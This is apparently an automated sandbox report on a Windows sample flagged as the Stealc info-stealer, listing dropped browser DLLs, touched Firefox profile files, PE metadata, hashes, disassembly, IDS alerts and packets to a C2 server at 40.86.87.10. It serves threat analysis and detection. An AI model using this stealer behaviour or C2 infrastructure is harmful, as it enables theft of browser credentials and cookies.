Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\i3NmF0obCm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.198135315600075
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	i3NmF0obCm.exe
File size:	161'792 bytes
MD5:	253ccac8a47b80287f651987c0c779ea
SHA1:	11db405849dbaa9b3759de921835df20fab35bc3
SHA256:	262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
SHA512:	af40e01bc3d36baf47eba1d5d6406220dfbcc52c6123dd8450e709fed3e72bed82aac6257fa7bdf7dd774f182919a5051e9712b2e7f1329defd0b159cb08385d
SSDEEP:	3072:ed5iO3xGNftsLz4oPNKMQgC6OFr41uIG5RaopW:ej3xGNVwlJ7OF08IQRa
TLSH:	64F32A20F543543DE5A245FE69EE6F79D599B9220305D0C3A3E02FD825F00F9A9B4A2F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x414920
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x668017E1 [Sat Jun 29 14:19:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	1ef0d6e4c3554a91026b47d9a27bf6db

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 4Ch
call 00007FE474F0985Ah
call 00007FE474F1EDC5h
push 0041E4C7h
lea ecx, dword ptr [ebp-0Ch]
call 00007FE474F1FC38h
call 00007FE474F08863h
call 00007FE474F087EEh
call 00007FE474F08799h
call 00007FE474F088A4h
call 00007FE474F1BD5Fh
call 00007FE474F0880Ah
call 00007FE474F1CDD5h
push eax
lea eax, dword ptr [ebp-4Ch]
push eax
push 0041E98Ch
lea ecx, dword ptr [ebp-40h]
push ecx
call 00007FE474F1CE52h
push eax
lea edx, dword ptr [ebp-34h]
push edx
push 0041E988h
lea eax, dword ptr [ebp-28h]
push eax
mov ecx, dword ptr [00625D20h]
push ecx
lea edx, dword ptr [ebp-1Ch]
push edx
lea ecx, dword ptr [ebp-0Ch]
call 00007FE474F1FE51h
mov ecx, eax
call 00007FE474F1FE4Ah
mov ecx, eax
call 00007FE474F1FE43h
mov ecx, eax
call 00007FE474F1FE3Ch
mov ecx, eax
call 00007FE474F1FE35h
push eax
lea ecx, dword ptr [ebp-0Ch]
call 00007FE474F1FD1Ch
lea ecx, dword ptr [ebp-4Ch]
call 00007FE474F1FC74h
lea ecx, dword ptr [ebp-40h]
call 00007FE474F1FC6Ch
lea ecx, dword ptr [ebp-34h]
call 00007FE474F1FC64h
lea ecx, dword ptr [ebp-28h]
call 00007FE474F1FC5Ch
lea ecx, dword ptr [ebp-1Ch]
call 00007FE474F1FC54h
mov eax, 00000001h
test eax, eax

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23470	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x237000	0x22c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0xe4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1ab3a	0x1ac00	560b12399e43a3c81010aed08f082b2f	False	0.4733772634345794	data	6.146817916264463	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1c000	0x793e	0x7a00	ea027e8e292c305bdd266e3880e056a4	False	0.5052510245901639	SysEx File -	5.7633971397174575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x24000	0x212b2c	0xc00	19faf8da5e1955c838607f4e97b23094	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x237000	0x41e4	0x4200	8e87b39d91fcf28d0a370a622a0fa119	False	0.43974905303030304	data	4.488198496436812	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

msvcrt.dll

strncpy, malloc, ??_V@YAXPAX@Z, memchr, ??_U@YAPAXI@Z, strtok_s, strcpy_s, vsprintf_s, memmove, memcpy, strlen, memset, memcmp, __CxxFrameHandler3

KERNEL32.dll

GetCurrentThreadId, LocalAlloc, VirtualQueryEx, OpenProcess, ReadProcessMemory, GetLastError, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, TerminateProcess, GetCurrentProcess, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, RtlUnwind, TlsGetValue, TlsSetValue, InterlockedIncrement, GetModuleHandleW, SetLastError, InterlockedDecrement, GetProcAddress, ExitProcess, Sleep, WriteFile, GetStdHandle, GetModuleFileNameW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryW, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, RaiseException

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-07:30:59.142233	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49730	80	192.168.2.4	40.86.87.10
07/02/24-07:31:00.731966	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49730	40.86.87.10	192.168.2.4
07/02/24-07:31:00.341853	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49730	80	192.168.2.4	40.86.87.10
07/02/24-07:30:59.953582	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49730	80	192.168.2.4	40.86.87.10
07/02/24-07:31:00.340102	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49730	40.86.87.10	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 07:30:59.136682034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:30:59.141997099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:30:59.142069101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:30:59.142232895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:30:59.147499084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:30:59.952100039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:30:59.952166080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:30:59.953582048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:30:59.958472013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.340101957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.340127945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.340186119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:00.341852903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:00.346657991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.731966019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.732099056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.732119083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.732136011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.732244015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:00.732251883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:00.732342005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:00.787657976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:00.792474031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.357908964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.357985020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:01.382038116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:01.382100105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:01.386897087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.386930943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.386966944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.387020111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.387048006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.387075901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.820453882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:01.820652962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.036533117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.041367054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.421729088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.421750069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.421761036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.421808004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.421845913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.423806906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.423820019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.423868895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.424021006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424081087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.424108982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424119949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424156904 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.424295902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424345016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.424371958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424382925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.424408913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.424426079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.551122904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551182032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551192045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551383972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.551387072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551397085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551439047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.551614046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551667929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.551693916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551706076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551743984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.551907063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551918030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.551961899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.552476883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.552525997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.552527905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.552539110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.552571058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.552587032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.552731991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.552746058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.552789927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.553287983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.553339005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.553355932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.553365946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.553396940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.553422928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.553567886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.553577900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.553625107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.554116011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.554168940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.554195881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.554205894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.554235935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.554245949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.634464025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.634592056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.666667938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.666743994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.666754007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.666822910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.666862011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.666909933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.666986942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.666996956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667031050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667064905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667227030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667237043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667247057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667284012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667313099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667510986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667579889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667629957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667640924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667684078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667749882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667762041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.667807102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.667917967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668096066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668143988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.668174982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668185949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668231010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.668395042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668406010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668415070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668452978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.668462038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.668808937 CEST	80	49730	40.86.87.10	192.168.2.4
